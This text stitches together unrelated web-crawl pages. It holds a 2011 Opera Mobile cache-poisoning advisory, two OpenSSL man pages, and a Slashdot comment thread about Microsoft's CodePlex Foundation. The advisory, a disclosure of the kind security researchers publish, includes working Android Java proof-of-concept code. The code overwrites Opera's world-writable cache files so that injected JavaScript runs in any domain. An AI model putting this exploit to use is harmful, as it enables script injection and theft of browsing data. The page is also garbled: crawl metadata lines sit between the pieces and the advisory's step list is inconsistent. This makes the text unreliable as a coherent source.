Currently most ORMs and serializers don’t have support for immutable types. Instead, they assume there will be a parameterless constructor and mutable properties. If this issue isn’t resolved in the more popular frameworks, record classes will be of little use in most projects.
For more information, see the draft specification Pattern Matching for C#. A prototype should be available in a few weeks.
Correction: This report erroneously stated that this feature would be part of C# 6 and VB 12.
Joe Enos
Maybe a static Record.FromXml(string xml) method with a generic parameter representing the specific record class (and another one for JSON, IDataReader, DataRow, IDictionary, FormCollection, etc.). As long as the names in the raw data line up to the properties, these should be pretty easy to build with a little reflection.
If they build enough of these translators, then I'd expect any third party library that does normal object hydration could be easily extended or enhanced to use these record classes.
Not sure I like the "with" syntax though - seems to me like it would be confusing to look at. If they can find a way to use more traditional code, it might look something like:
// instead of
var x2 = x1 with B: 16;
// maybe one of these
var x2 = x1.Copy(new { B = 16 });
var x2 = x1.Copy(o => { o.B = 16; });
var x2 = Record.CreateCopyFrom(x1, B: 16);
Time to take a look at F#
by
Arturo Hernandez
I can't really list all the benefits here but, if you are reading this article chances are you should take a look at F#.
Library concerns
by
Roger Alsing
Since these are immutable types, you will not use them for "fat" entities, since they are not mutable.
So the only thing you could use them for in an ORM, is projections, and the libs do support selecting projections.
e.g.
.Select(e => new MyRecord(e.Name,e.Age));
So, it will still be of good use if you need projections with known types instead of anonymous types.
Looks great!
by
Ian Yates
I've been able to teach JSON.Net how to handle these objects without too much fuss as well.
When my code assistance tool (at the moment Telerik's JustCode because I get it with the GUI components subscription I already have with them) catches up with these new C# features I'll happily jump ship for new code and gradually shift over my old code.
Re: Time to take a look at F#
by
Isaac Abraham
Looks like C# is slowly but surely morphing into F# with a C# syntax
by
Phylos Zero
Explicitly defined backing store?
by
Craig Wagner
Perhaps I'm just being dense here, but I don't understand why today each property requires an explicit backing store. For instance:
public class Point
{
public int X { get; private set; }
public int Y { get; private set; }
public Point( int x, int y )
{
X = x;
Y = y;
}
}
Granted it's still more code than the example shown in the article, but this code does not declare explicit backing store variables yet once the object is created X and Y cannot be changed (other than using reflection of course). What am I missing?
Re: Explicitly defined backing store?
by
Jonathan Allen
|
https://www.infoq.com/news/2014/08/Record-Class
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Ok, well I attempted another exercise in the book. It was to 'Write a program that reads in a sequence of positive numbers and prints out the total and average value. The end of the sequence should be signalled by entering -1'.
This is what I came up with:
Only when I enter -1 it messes up and says an error log is being created :(

Code:
#include <iostream.h>
int main()
{
int x, y = 0, z = 0;
while(x != -1)
{
x = 0;
cout << "Enter a number: ";
cin >> x;
z++;
y = x + y;
}
y = y + 1;
cout << "The average of those numbers is " << y / z;
}
Thanks if you can help
-Marlon
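For comparison, one hedged rework of the same exercise: read each value first and only add it to the running total when it is not the -1 sentinel, so the sentinel never skews the sum or the count. The original crash is most likely because x is read in the while condition before it has been given a value. This sketch uses the standard <iostream> header and is just one possible structure, not the only fix.

Code:
#include <iostream>

int main()
{
    int value;
    int total = 0;
    int count = 0;

    std::cout << "Enter a number (-1 to stop): ";
    while (std::cin >> value && value != -1)
    {
        total += value;   // only real entries are added
        ++count;
        std::cout << "Enter a number (-1 to stop): ";
    }

    std::cout << "The total is " << total << "\n";
    if (count > 0)
        std::cout << "The average is " << static_cast<double>(total) / count << "\n";

    return 0;
}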
|
http://cboard.cprogramming.com/cplusplus-programming/78098-another-problem-printable-thread.html
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Looks like interesting work. How does this differ from the already existing Time library?
Was looking at your code, alvarojusten, saw the function to represent the day of week as a string. Don't know if you noticed, but all the clock does is increment the day of the week by one (rolling from 7 to 1) every time it hits midnight. It does *not* seem to have any fixed association between the date/month/year and what day of the week it is. Convenient in some ways as you are perfectly able to define 1=Sunday, 1=Monday... or 1=Thursday for that matter (if you can get the hang of Thursdays...). Similarly, it is perfectly happy to let you set the date to Feb 30... and then it continues to the 31st. Seems to know if the current m/d/y is the last day of the month -- and if so, it will roll to the next month at midnight. But it won't force the date to be valid for the month/year.
Had a chance to learn Git and put what I've done up. My goal in creating yet another DS1307 library was to provide easy access to some of the other functions I needed from the chip, specifically its square wave output (for an interrupt) and its battery-backed RAM (to allow configuration info to persist across restarts of the Arduino). (It's annoying, but I suppose necessary, that the Arduino restarts every time you open the Serial Monitor.) I've included an example sketch which allows you to set most everything interactively from the Serial Monitor. Also a Fritzing board based on the Sparkfun module.
(the Time library has) a lot of features that I don't need (NTP, time deltas etc.)
The Time library also "pollutes" the namespace since it adds a lot of functions (hour(), minute() etc.) instead of creating a class, instantiating it, etc.
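To make the day-of-week and battery-backed-RAM behaviour discussed above concrete, here is a minimal, untested sketch that talks to the DS1307 directly with the standard Wire library rather than through any particular DS1307 library. The register addresses follow the DS1307 datasheet (0x03 = day of week, 0x08-0x3F = 56 bytes of NVRAM); the stored value is an arbitrary example.

#include <Wire.h>

const uint8_t DS1307_ADDR = 0x68;   // fixed I2C address of the DS1307

uint8_t readRegister(uint8_t reg)
{
    Wire.beginTransmission(DS1307_ADDR);
    Wire.write(reg);
    Wire.endTransmission();
    Wire.requestFrom(DS1307_ADDR, (uint8_t)1);
    return Wire.read();
}

void writeRegister(uint8_t reg, uint8_t value)
{
    Wire.beginTransmission(DS1307_ADDR);
    Wire.write(reg);
    Wire.write(value);
    Wire.endTransmission();
}

void setup()
{
    Serial.begin(9600);
    Wire.begin();

    // Day of week is a free-running 1..7 counter; the mapping to
    // Sunday/Monday/... is whatever you decide it is.
    Serial.print("Day of week register: ");
    Serial.println(readRegister(0x03));

    // Battery-backed RAM starts at 0x08: handy for configuration that
    // must survive an Arduino reset.
    writeRegister(0x08, 42);
    Serial.print("NVRAM[0] = ");
    Serial.println(readRegister(0x08));
}

void loop() {}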
|
http://forum.arduino.cc/index.php?topic=59256.msg496464
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Details
- Type: Improvement
- Status: Closed
- Priority: Minor
- Resolution: Fixed
- Affects Version/s: 4.7
- Component/s: modules/analysis
- Lucene Fields: New, Patch Available
Description
Add a TokenFilter that strips characters after an apostrophe (including the apostrophe itself).
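The actual change is a Java TokenFilter for Lucene; for readers unfamiliar with the behaviour being proposed, the core string operation is simply truncation at the first apostrophe. The following is only a standalone C++ sketch of that operation, not the patch itself.

#include <iostream>
#include <string>

// Keep only the part of the token before the first apostrophe
// (the apostrophe itself is dropped too).
std::string stripAfterApostrophe(const std::string &token)
{
    const std::string::size_type pos = token.find('\'');
    return pos == std::string::npos ? token : token.substr(0, pos);
}

int main()
{
    std::cout << stripAfterApostrophe("Golu'ne") << '\n';  // prints "Golu"
    std::cout << stripAfterApostrophe("Ankara") << '\n';   // unchanged
    return 0;
}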
Activity
+1, i saw your paper (very nice) on this and think it would be a great addition to lucene!
This patch adds a new TokenFilter named ApostropheFilter.
Thank you for your interest, Robert Muir! Here is the paper in case anyone is interested. It's more like a Solr writeup though.
Hi,
your patch contains unrelated changes in analysis' modules root folder (adding of a useless classpath). Can you fix this?
Also, because you add new functionality, TurkishAnalyzer should only add the new TokenFilter, if matchVersion is at least LUCENE_48.
It is possible to achieve the described behavior with the following existing filters (without a custom filter). Any thoughts on which way is preferred?
<filter class="solr.PatternReplaceFilterFactory" pattern="(.*)'(.*)" replacement="$1"/>
<filter class="solr.PatternCaptureGroupFilterFactory" pattern="(.*)'" preserve_original="false" />
I prefer the explicit filter you have now!
This should also work:
<filter class="solr.PatternReplaceFilterFactory" pattern="'(.*)" replacement=""/>
Thanks for looking into this Uwe Schindler. I wanted to use QueryParser in TestTurkishAnalyzer.java but I am not familiar with ant. I want to include a checkMatch(String text, String qString) method that checks this : "this query string" should retrieve "this document text"
I added this but not sure this is correct.
<path id="classpath"> <path refid="base.classpath"/> <pathelement path="${queryparser.jar}"/> </path>
Generally speaking its enough to just do assertAnalyzesTo/tokenStreamContents in unit tests. it keeps everything simple and easier to debug than integration-like tests.
Thats why we don't depend on queryparser in any of the tests today.
We should not add an additional dependency to the query parser module! I would remove this test, we generally don't add such type of tests. Use BaseTokenStreamTestCase as base class for your test and use the various assert methods to check if the token stream is what you expect. Feeding IndexWriter with your tokens and executing a search is not really a "unit test" anymore. We have enough tests for the indexing.
Useless classpath change and test case removed.
This looks great Ahmet: As Uwe mentioned, i think the only change we need is the condition in TurkishAnalyzer:
if matchVersion.onOrAfter(Version.LUCENE_48) {
  // do new stuff, include the new filter
} else {
  // do old stuff
}
Otherwise, this change looks ready to me.
Oh one other thing that would be nice, if you could add some javadocs to the public classes?
The factories typically have an example of its use (see some of the others). For the filter itself, maybe just a simple description of what it does, and a reference to your paper would be good (since you have done experiments and so on).
if matchVersion.onOrAfter(Version.LUCENE_48)
I tried this but there is no LUCENE_48 in trunk.
Thats a bug. I will take care of it right now!
Commit 1573059 from Robert Muir in branch 'dev/trunk'
[ ]
LUCENE-5482: add missing constant
Commit 1573061 from Robert Muir in branch 'dev/branches/branch_4x'
[ ]
LUCENE-5482: remove wrong text from this, its not the latest
Thanks for pointing that out, you should see the constant now.
Java doc for public classes added
Version.LUCENE_48 check added to TurkishAnalyzer
Should we add this if check to TestTurkishAnalyzer too?
if(matchVersion.onOrAfter(Version.LUCENE_48)) // check apostrophes
No its ok, because we only instantiate analyzers with the latest version
Great, Thanks for guidance and comments!
Commit 1573066 from Robert Muir in branch 'dev/trunk'
[ ]
LUCENE-5482: Improve default TurkishAnalyzer
Cool, thanks!
+1 to commit
Commit 1573074 from Robert Muir in branch 'dev/branches/branch_4x'
[ ]
LUCENE-5482: Improve default TurkishAnalyzer
Thanks Ahmet!
I made one addition: I also inserted this filter into the text_tr chain in the solr example.
Close issue after release of 4.8.0
This is similar to ClassicFilter that removes 's from the end of words. But ClassicFilter is useful for English language only and has nothing to do with Turkish. Because it only removes 's and 'S. In Turkish different character sequences may come after an apostrophe. e.g. 'nin, 'a, 'nin, 'ü etc.
In Turkish, apostrophe is used to separate suffixes from proper names (continent, sea, river, lake, mountain, upland, proper names related to religion and mythology). For example Van Gölü’ne (meaning: to Lake Van).
|
https://issues.apache.org/jira/browse/LUCENE-5482
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Re: volatile Info
- From: crisgoogle <crisgoogle@xxxxxxxxx>
- Date: Fri, 6 Aug 2010 14:24:27 -0700 (PDT)
On Aug 6, 12:22 pm, Keith Thompson <ks...@xxxxxxx> wrote:.
First off, I totally agree that this is all rather academic unless
you actually own a DS9K.
And I can't quite put my finger on what I'm trying to get at here,
so bear with me =)
Let's say that there _is_ some mechanism by which an object's value
may change, independently of what the abstract machine would otherwise
dictate. Modifying your example above:
<code>
/* assume that this is an implementation-defined memory-mapped
register that _ought_ to be treated as volatile. */
int *reg = (int *) 0x4000;
#include <stdlib.h>
/* The parameter here _ought_ be declared as volatile. */
int square(int *x) {
return *x * *x;
}
int main(void) {
*reg = 10;
return square(reg) == 100 ? EXIT_SUCCESS : EXIT_FAILURE;
}
</code>
(I think I got that right).
In parallel to your explanation with your original example, I think
you're suggesting that the implementation is non-conforming if
this program returns EXIT_FAILURE.
Does this code exhibit undefined behaviour? Unless I made a mistake
or missed something, I don't think so (ignoring overflow,
as usual).
So it seems peculiar to me that the programmer can render the
implementation non-conforming by omitting the volatile in the
declaration of square().
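For concreteness, this is what the "ought to be volatile" version of the same example would look like (same made-up register address; only the qualifiers change):

<code>
#include <stdlib.h>

/* The declarations the post says "ought" to be used: both the object and
   the pointed-to parameter are volatile-qualified, so the implementation
   must perform the actual accesses. 0x4000 is still an assumed,
   implementation-defined memory-mapped register address. */
volatile int *reg = (volatile int *) 0x4000;

int square(volatile int *x) {
    return *x * *x;
}

int main(void) {
    *reg = 10;
    return square(reg) == 100 ? EXIT_SUCCESS : EXIT_FAILURE;
}
</code>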
- Follow-Ups:
- Re: volatile Info
- From: Keith Thompson
- References:
- volatile Info
- From: manu
- Re: volatile Info
- From: Shao Miller
- Re: volatile Info
- From: Scott Fluhrer
- Re: volatile Info
- From: Seebs
- Re: volatile Info
- From: crisgoogle
- Re: volatile Info
- From: Malcolm McLean
- Re: volatile Info
- From: crisgoogle
- Re: volatile Info
- From: Keith Thompson
|
http://coding.derkeiler.com/Archive/C_CPP/comp.lang.c/2010-08/msg00455.html
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
supported.
Examples
GVariant *value1, *value2, *value3, *value4;

value1 = g_variant_new ("y", 200);
value2 = g_variant_new ("b", TRUE);
value3 = g_variant_new ("d", 37.5);
value4 = g_variant_new ("x", G_GINT64_CONSTANT (998877665544332211));

{
  gdouble floating;
  gboolean truth;
  gint64 bignum;

  g_variant_get (value1, "y", NULL);      /* ignore the value. */
  g_variant_get (value2, "b", &truth);
  g_variant_get (value3, "d", &floating);
  g_variant_get (value4, "x", &bignum);
}
Strings
Characters: s, o, g
String conversions occur to and from standard nul-terminated C strings. Upon encountering an 's', 'o' or 'g' in a format string, g_variant_new() takes a (const gchar *) and makes a copy of it. NULL is not a valid string.
Examples
GVariant *value1, *value2, *value3;

value1 = g_variant_new ("s", "hello world!");
value2 = g_variant_new ("o", "/must/be/a/valid/path");
value3 = g_variant_new ("g", "iias");

#if 0
g_variant_new ("s", NULL);   /* not valid: NULL is not a string. */
#endif

{
  gchar *result;

  g_variant_get (value1, "s", &result);
  g_print ("It was '%s'\n", result);
  g_free (result);
}
Examples
GVariantBuilder *builder;
GVariant *value;

builder = g_variant_builder_new (G_VARIANT_TYPE ("as"));
g_variant_builder_add (builder, "s", "when");
g_variant_builder_add (builder, "s", "in");
g_variant_builder_add (builder, "s", "the");
g_variant_builder_add (builder, "s", "course");
value = g_variant_new ("as", builder);
g_variant_builder_unref (builder);

{
  GVariantIter *iter;
  gchar *str;

  g_variant_get (value, "as", &iter);
  while (g_variant_iter_loop (iter, "s", &str))
    g_print ("%s\n", str);
  g_variant_iter_free (iter);
}

g_variant_unref (value);
Examples
GVariant *value1, *value2, *value3, *value4, *value5, *value6;

value1 = g_variant_new ("ms", "Hello world");
value2 = g_variant_new ("ms", NULL);
value3 = g_variant_new ("(m(ii)s)", TRUE, 123, 456, "Done");
value4 = g_variant_new ("(m(ii)s)", FALSE, -1, -1, "Done");   /* both '-1' are ignored. */
value5 = g_variant_new ("(m@(ii)s)", NULL, "Done");

{
  GVariant *contents;
  const gchar *cstr;
  gboolean just;
  gint32 x, y;
  gchar *str;

  g_variant_get (value1, "ms", &str);
  if (str != NULL)
    g_print ("str: %s\n", str);
  else
    g_print ("it was null\n");
  g_free (str);

  g_variant_get (value2, "m&s", &cstr);
  if (cstr != NULL)
    g_print ("str: %s\n", cstr);
  else
    g_print ("it was null\n");
  /* don't free 'cstr' */

  /* NULL passed for the gboolean *, but two 'gint32 *' still collected */
  g_variant_get (value3, "(m(ii)s)", NULL, NULL, NULL, &str);
  g_print ("string is %s\n", str);
  g_free (str);

  /* note: &s used, so g_free() not needed */
  g_variant_get (value4, "(m(ii)&s)", &just, &x, &y, &cstr);
  if (just)
    g_print ("it was (%d, %d)\n", x, y);
  else
    g_print ("it was null\n");
  g_print ("string is %s\n", cstr);   /* don't free 'cstr' */

  g_variant_get (value5, "(m*s)", &contents, NULL);   /* ignore the string. */
  if (contents != NULL)
    {
      g_variant_get (contents, "(ii)", &x, &y);
      g_print ("it was (%d, %d)\n", x, y);
      g_variant_unref (contents);
    }
  else
    g_print ("it was null\n");
}
Tuples
Characters:
()
Tuples are handled by handling each item in the tuple, in sequence. Each item is handled in the usual way.
Examples
GVariant *value1, *value2;

value1 = g_variant_new ("(s(ii))", "Hello", 55, 77);
value2 = g_variant_new ("()");

{
  gchar *string;
  gint x, y;

  g_variant_get (value1, "(s(ii))", &string, &x, &y);
  g_print ("%s, %d, %d\n", string, x, y);
  g_free (string);

  g_variant_get (value2, "()");   /* do nothing... */
}
Dictionaries
Characters:
{}
Dictionary entries are handled by handling first the key, then the value. Each.
Examples
GVariant *value1, *value2;

value1 = g_variant_new ("(i@ii)", 44, g_variant_new_int32 (55), 66);
/* note: consumes floating reference count on 'value1' */
value2 = g_variant_new ("(@(iii)*)", value1, g_variant_new_string ("foo"));

{
  const gchar *string;
  GVariant *tmp;
  gsize length;
  gint x, y, z;

  g_variant_get (value2, "((iii)*)", &x, &y, &z, &tmp);
  string = g_variant_get_string (tmp, &length);
  g_print ("it is %d %d %d %s (length=%d)\n", x, y, z, string, (int) length);
  g_variant_unref (tmp);

  /* quick way to skip all the values in a tuple */
  g_variant_get (value2, "(rs)", NULL, &string);   /* or "(@(iii)s)" */
  g_print ("i only got the string: %s\n", string);
  g_free (string);
}
|
http://developer.gnome.org/glib/unstable/gvariant-format-strings.html
|
crawl-003
|
en
|
refinedweb
|
Paul Haeberli
Silicon Graphics Computer Systems
paulhaeberli@yahoo.com
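A helper for the 16-bit header fields is sketched here along the same lines as getlong() below (the original document's version is not reproduced; this one uses an ANSI prototype rather than the K&R style of getlong()):

static unsigned short getshort(FILE *inf)
{
    unsigned char buf[2];

    /* Header fields are stored big-endian, so assemble the value byte by byte. */
    fread(buf, 2, 1, inf);
    return (unsigned short)((buf[0] << 8) + (buf[1] << 0));
}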
And this function will read a long value from the file:
static long getlong(inf)
FILE *inf;
{
    unsigned char buf[4];

    fread(buf,4,1,inf);
    return (buf[0]<<24)+(buf[1]<<16)+(buf[2]<<8)+(buf[3]<<0);
}
If the image is not run length encoded, this is the structure:
The Header
The Image Data
If the image is run length encoded, this is the structure:
The Header
The Offset Tables
The Image Data
The header consists of the following:
Size      | Type   | Name      | Description
2 bytes   | short  | MAGIC     | IRIS image file magic number
1 byte    | char   | STORAGE   | Storage format
1 byte    | char   | BPC       | Number of bytes per pixel channel
2 bytes   | ushort | DIMENSION | Number of dimensions
2 bytes   | ushort | XSIZE     | X size in pixels
2 bytes   | ushort | YSIZE     | Y size in pixels
2 bytes   | ushort | ZSIZE     | Number of channels
4 bytes   | long   | PIXMIN    | Minimum pixel value
4 bytes   | long   | PIXMAX    | Maximum pixel value
4 bytes   | char   | DUMMY     | Ignored
80 bytes  | char   | IMAGENAME | Image name
4 bytes   | long   | COLORMAP  | Colormap ID
404 bytes | char   | DUMMY     | Ignored
|
http://www.talisman.org/~erlkonig/misc/sgi-image-file-format-spec.html
|
crawl-003
|
en
|
refinedweb
|
#include <openssl/ssl.h>
void SSL_CTX_set_tmp_dh_callback(SSL_CTX *ctx,
DH *(*tmp_dh_callback)(SSL *ssl, int is_export, int keylength));
long SSL_CTX_set_tmp_dh(SSL_CTX *ctx, DH *dh);
void SSL_set_tmp_dh_callback(SSL *ssl,
DH *(*tmp_dh_callback)(SSL *ssl, int is_export, int keylength));
long SSL_set_tmp_dh(SSL *ssl, DH *dh);
SSL_CTX_set_tmp_dh_callback() sets the callback function for ctx to be
used when DH parameters are required to tmp_dh_callback. The callback
is inherited by all ssl objects created from ctx.
SSL_CTX_set_tmp_dh() sets the DH parameters to be used to dh. When an
ephemeral DH cipher suite is used, the session keys are negotiated using
the ephemeral/temporary DH key and the key supplied and certified by
the certificate chain is only used for signing. Anonymous ciphers
(without a permanent server key) also use ephemeral DH keys.
Using ephemeral DH key exchange yields forward secrecy, as the
connection can only be decrypted when the DH key is known. By generating
a temporary DH key inside the server application that is lost when the
application is left, it becomes impossible for an attacker to decrypt
past sessions, even if he gets hold of the normal (certified) key, as
this key was only used for signing.
In order to perform a DH key exchange the server must use a DH group
(DH parameters) and generate a DH key. The server will always generate
a new DH key during the negotiation, when the DH parameters are
supplied.
an attacker may specialize on a very often used DH group. Applications
should therefore generate their own DH parameters during the
installation process using the openssl dhparam(1) application. The
generation of DH parameters during installation is therefore
recommended.
An application may either directly specify the DH parameters or can
supply the DH parameters via a callback function. The callback approach
has the advantage that the callback may supply DH parameters for
different key lengths.
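A minimal sketch of the callback approach, assuming the DH parameters were pre-generated with "openssl dhparam -out dh1024.pem 1024"; the file name, helper names, and the reduced error handling are placeholders, not part of the man page:

#include <stdio.h>
#include <openssl/ssl.h>
#include <openssl/pem.h>
#include <openssl/dh.h>

static DH *dh1024 = NULL;

/* Load the pre-generated parameters once at startup. */
static int load_dh_params(const char *file)
{
    FILE *fp = fopen(file, "r");
    if (fp == NULL)
        return 0;
    dh1024 = PEM_read_DHparams(fp, NULL, NULL, NULL);
    fclose(fp);
    return dh1024 != NULL;
}

/* Callback matching the signature shown in the SYNOPSIS above.
   A real application would keep one parameter set per key length. */
static DH *tmp_dh_callback(SSL *ssl, int is_export, int keylength)
{
    (void)ssl; (void)is_export; (void)keylength;
    return dh1024;
}

int main(void)
{
    SSL_library_init();

    SSL_CTX *ctx = SSL_CTX_new(SSLv23_server_method());
    if (ctx == NULL || !load_dh_params("dh1024.pem"))
        return 1;

    SSL_CTX_set_tmp_dh_callback(ctx, tmp_dh_callback);
    /* ... continue with normal server setup ... */

    SSL_CTX_free(ctx);
    return 0;
}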
0.9.8d 2001-09-06 SSL_CTX_set_tmp_dh_callback(3)
|
http://www.syzdek.net/~syzdek/docs/man/.shtml/man3/SSL_CTX_set_tmp_dh_callback.3.html
|
crawl-003
|
en
|
refinedweb
|
This "software driver" implements the communication protocol for interfacing a SICK LMS 2XX laser scanners through a standard RS232 serial port (or a USB2SERIAL converter).
The serial port is opened upon the first call to "doProcess" or "initialize", so you must call "loadConfig" before this, or manually call "setSerialPort". Another alternative is to call the base class method C2DRangeFinderAbstract::bindIO, but the "setSerialPort" interface is probably much simpler to use.
For an example of usage see the example in "samples/SICK_laser_serial_test". See also the example configuration file for rawlog-grabber in "share/mrpt/config_files/rawlog-grabber".
PARAMETERS IN THE ".INI"-LIKE CONFIGURATION STRINGS:
-------------------------------------------------------
[supplied_section_name]
COM_port_WIN = COM1   // Serial port to connect to
COM_port_LIN = ttyS0
COM_baudRate = 38400  // Possible values: 9600 (default), 38400, 5000000
mm_mode      = 1/0    // 1: millimeter mode, 0: centimeter mode (Default=0)
FOV          = 180    // Field of view: 100 or 180 degrees (Default=180)
resolution   = 50     // Scanning resolution, in units of 1/100 degree. Valid values: 25,50,100 (Default=50)
pose_x       = 0.21   // Laser range scanner 3D position in the robot (meters)
pose_y       = 0
pose_z       = 0.34
pose_yaw     = 0      // Angles in degrees
pose_pitch   = 0
pose_roll    = 0
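A rough usage sketch based only on the member descriptions on this page; the header locations, the exact signature of doProcessSimple(), and the observation type are assumptions and should be checked against the actual MRPT headers:

// Sketch only: names other than CSickLaserSerial, setSerialPort(),
// initialize() and doProcessSimple() (all mentioned in this page) are
// assumptions, not verified against MRPT.
#include <mrpt/hwdrivers/CSickLaserSerial.h>
#include <mrpt/slam/CObservation2DRangeScan.h>   // assumed header location

int main()
{
    mrpt::hwdrivers::CSickLaserSerial laser;

    // Manual setup instead of loadConfig() (see the .ini parameters above).
    laser.setSerialPort("ttyS0");        // "COM1" on Windows

    laser.initialize();                  // opens the port / LMS protocol setup

    bool thereIsObservation = false, hardwareError = false;
    mrpt::slam::CObservation2DRangeScan scan;   // assumed observation class

    for (;;)
    {
        laser.doProcessSimple(thereIsObservation, scan, hardwareError);
        if (hardwareError)
            break;                       // e.g. comms failure
        if (thereIsObservation)
        {
            // ... use the range data held in 'scan' here ...
        }
    }
    return 0;
}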
Definition at line 70 of file CSickLaserSerial.h.
#include <mrpt/hwdrivers/CSickLaserSerial.h>
Definition at line 84 of file CGenericSensor.h.
Definition at line 85 of file CGenericSensor.h.
The current state of the sensor.
Definition at line 90 of file CGenericSensor.h.
Constructor.
Destructor.
Like appendObservations() but for just one observation.
Definition at line 155 of file CGenericSensor.h.
This method must be called by derived classes to enqueue a new observation in the list to be returned by getObservations.
Passed objects must be created in dynamic memory and a smart pointer passed. Example of creation:
CObservationGPSPtr o = CObservationGPSPtr( new CObservationGPS() );
o-> .... // Set data
appendObservation(o);
If several observations are passed at once in the vector, they'll be considered as a block regarding the grabbing decimation factor.
Binds the object to a given I/O channel.
The stream object must not be deleted before the destruction of this class.
Creates a sensor by a name of the class.
Typically the user may want to create a smart pointer around the returned pointer, whis is made with:
CGenericSensorPtr sensor = CGenericSensorPtr( CGenericSensor::createSensor("XXX") );
Just like createSensor, but returning a smart pointer to the newly created sensor object.
Definition at line 188 of file CGenericSensor.h.
Main method for a CGenericSensor.
Implements mrpt::hwdrivers::CGenericSensor.
Reimplemented in mrpt::hwdrivers::CLMS100Eth.
Specific laser scanner "software drivers" must process here new data from the I/O stream, and, if a whole scan has arrived, return it.
This method will be typically called in a different thread than other methods, and will be called in a timely fashion.
Implements mrpt::hwdrivers::C2DRangeFinderAbstract.
Mark as invalid those ranges in a set of forbiden angle ranges.
Mark as invalid those points which (x,y) coordinates fall within the exclusion polygons.
Definition at line 138 of file CSickLaserSerial.h.
If performing several tries in ::initialize(), this is the current try loop number.
Definition at line 159 of file CSickLaserSerial.h.
Definition at line 241 of file CGenericSensor.h.
Get the last observation from the sensor, if available, and unmarks it as being "the last one" (thus a new scan must arrive or subsequent calls will find no new observations).
Returns a list of enqueued objects, emptying it (thread-safe).
The objects must be freed by the invoker.
Definition at line 100 of file CGenericSensor.h.
Definition at line 150 of file CSickLaserSerial.h.
Definition at line 156 of file CSickLaserSerial.h.
Definition at line 102 of file CGenericSensor.h.
Definition at line 129 of file CSickLaserSerial.h.
The current state of the sensor.
Definition at line 98 of file CGenericSensor.h.
Set-up communication with the laser.
Called automatically by rawlog-grabber. If used manually, call after "loadConfig" and before "doProcess".
In this class this method does nothing, since the communications are setup at the first try from "doProcess" or "doProcessSimple".
Reimplemented from mrpt::hwdrivers::CGenericSensor.
Returns false on error.
Send a command to change the LMS comms baudrate, return true if ACK is OK. baud can be: 9600, 19200, 38400, 500000.
Assures laser is connected and operating at 38400, in its case returns true.
Send a status query and wait for the answer. Return true on OK.
Returns false if timeout.
Returns false if timeout.
Loads the generic settings common to any sensor (See CGenericSensor), then call to "loadConfig_sensorSpecific"
Loads specific configuration for the device from a given source of configuration parameters, for example, an ".ini" file, loading from the section "[iniSection]" (see utils::CConfigFileBase and derived classes) See hwdrivers::CSickLaserSerial for the possible parameters..
Sends a formated text to "debugOut" if not NULL, or to cout otherwise.
Referenced by mrpt::math::CLevenbergMarquardtTempl< VECTORTYPE, USERPARAM >::execute().
Register a class into the internal list of "CGenericSensor" descendents.
Used internally in the macros DEFINE_GENERIC_SENSOR, etc...
Can be used as "CGenericSensor::registerClass( SENSOR_CLASS_ID(CMySensor) );" if building custom sensors outside mrpt libraries in user code.
Send header+command-data+crc and waits for ACK. Return false on error.
Changes the serial port baud rate (call prior to 'doProcess'); valid values are 9600,38400 and 500000.
This is not needed if the configuration is loaded with "loadConfig".
Definition at line 134 of file CSickLaserSerial.h.
Set the extension ("jpg","gif","png",...) that determines the format of images saved externally The default is "jpg".
Definition at line 233 of file CGenericSensor.h.
The quality of JPEG compression, when external images is enabled and the format is "jpg".
Definition at line 238 of file CGenericSensor.h.
Enables/Disables the millimeter mode, with a greater accuracy but a shorter range (default=false) (call prior to 'doProcess') This is not needed if the configuration is loaded with "loadConfig".
Definition at line 144 of file CSickLaserSerial.h.
Set the path where to save off-rawlog image files (will be ignored in those sensors where this is not applicable).
An empty string (the default value at construction) means to save images embedded in the rawlog, instead of on separate files.
Reimplemented in mrpt::hwdrivers::CCameraSensor, mrpt::hwdrivers::CKinect, and mrpt::hwdrivers::CSwissRanger3DCamera.
Definition at line 225 of file CGenericSensor.h.
Set the scanning field of view - possible values are 100 or 180 (default) (call prior to 'doProcess') This is not needed if the configuration is loaded with "loadConfig".
Definition at line 149 of file CSickLaserSerial.h.
Set the scanning resolution, in units of 1/100 degree - Possible values are 25, 50 and 100, for 0.25, 0.5 (default) and 1 deg.
(call prior to 'doProcess') This is not needed if the configuration is loaded with "loadConfig".
Definition at line 155 of file CSickLaserSerial.h.
Definition at line 103 of file CGenericSensor.h.
Changes the serial port to connect to (call prior to 'doProcess'), for example "COM1" or "ttyS0".
This is not needed if the configuration is loaded with "loadConfig".
Definition at line 126 of file CSickLaserSerial.h.
Tries to open the com port and setup all the LMS protocol. Returns true if OK or already open.
Disables the scanning mode (in this class this has no effect).
Implements mrpt::hwdrivers::C2DRangeFinderAbstract.
Enables the scanning mode (in this class this has no effect).
Implements mrpt::hwdrivers::C2DRangeFinderAbstract.
Definition at line 82 of file CSickLaserSerial.h.
Baudrate: 9600, 38400, 500000.
Definition at line 104 of file CSickLaserSerial.h.
If set to non-empty, the serial port will be attempted to be opened automatically when this class is first used to request data from the laser.
Definition at line 102 of file CSickLaserSerial.h.
The extension ("jpg","gif","png",...) that determines the format of images saved externally.
Definition at line 139 of file CGenericSensor.h.
For JPEG images, the quality (default=95%).
Definition at line 140 of file CGenericSensor.h.
Definition at line 75 of file CSickLaserSerial.h.
Will be !=NULL only if I created it, so I must destroy it at the end.
Definition at line 103 of file CSickLaserSerial.h.
Default = 1.
Definition at line 105 of file CSickLaserSerial.h.
Definition at line 106 of file CSickLaserSerial.h.
The path where to save off-rawlog images: empty means save images embedded in the rawlog.
Definition at line 138 of file CGenericSensor.h.
See CGenericSensor.
Definition at line 125 of file CGenericSensor.h.
Definition at line 100 of file CSickLaserSerial.h.
100 or 180 deg
Definition at line 76 of file CSickLaserSerial.h.
1/100th of deg: 100, 50 or 25
Definition at line 77 of file CSickLaserSerial.h.
See CGenericSensor.
Definition at line 128 of file CGenericSensor.h.
The sensor 6D pose:
Definition at line 80 of file CSickLaserSerial.h.
Definition at line 134 of file CGenericSensor.h.
The I/O channel (will be NULL if not bound).
Definition at line 81 of file C2DRangeFinderAbstract.h.
|
http://reference.mrpt.org/stable/classmrpt_1_1hwdrivers_1_1_c_sick_laser_serial.html
|
crawl-003
|
en
|
refinedweb
|
1 Background
=============
Android applications are executed in a sandbox environment, to ensure that no
application can access sensitive information held by another, without adequate
privileges. For example, Opera Mobile holds sensitive information such as
cookies, cache and history, and this cannot be accessed by third-party apps. By running applications as different users, files
owned by one application cannot be accessed by another (unless access is
explicitly allowed).
